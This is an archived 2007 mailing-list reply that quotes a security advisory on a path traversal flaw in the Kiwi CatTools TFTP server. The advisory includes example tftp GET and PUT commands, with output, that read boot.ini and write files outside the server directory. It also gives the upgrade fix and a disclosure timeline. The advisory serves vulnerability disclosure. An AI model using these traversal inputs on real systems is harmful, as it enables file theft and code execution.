| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 27 Feb 2007 18:17:45 +0300 From: 3APA3A <3APA3A@...URITY.NNOV.RU> To: "noreply" <noreply@...ecurity.ru> Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: Re: Kiwi CatTools TFTP server path traversal Probably, it's same or related issue for reported by nicob at nicob.net. http://securityvulns.com/news/KIWI/CatTools/DT.html CVE-2007-0888 --Wednesday, February 28, 2007, 12:47:17 AM, you wrote to bugtraq@...urityfocus.com: n> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 n> server can lead to information disclosure and remote code execution n> Risk: High n> DISCUSSION n> Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET n> request which can be used to download/upload any file from/to server. n> Default setting allows replacing of existing files. Such settings lead to n> probability to replace an executable files and run code on attacker choice. n> EXAMPLES C:\>>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt n> Transfer successful: 212 bytes in 1 second, 212 bytes/s C:\>>type boot.txt n> [boot loader] n> timeout=30 n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS C:\>>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt n> Transfer successful: 212 bytes in 1 second, 212 bytes/s C:\>>type pttest.txt n> [boot loader] n> timeout=30 n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS C:\>> n> SOLUTION n> Upgrade to CatTools 3.2.9 which is available for download at n> <http://www.kiwisyslog.com/downloads.php> n> http://www.kiwisyslog.com/downloads.php n> CREDITS n> Sergey Gordeychik of Positive Technologies (www.ptsecurity.com) n> DISCLOSURE TIMELINE n> Vulnerability discovered: 11/20/2006 n> Initial vendor contact: 12/08/2006 n> Patch released: 02/13/2007 n> Public disclosure: 02/27/2007 -- ~/ZARAZA http://securityvulns.com/ Пока вы во власти провидения, вам не удастся умереть раньше срока. (Твен) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists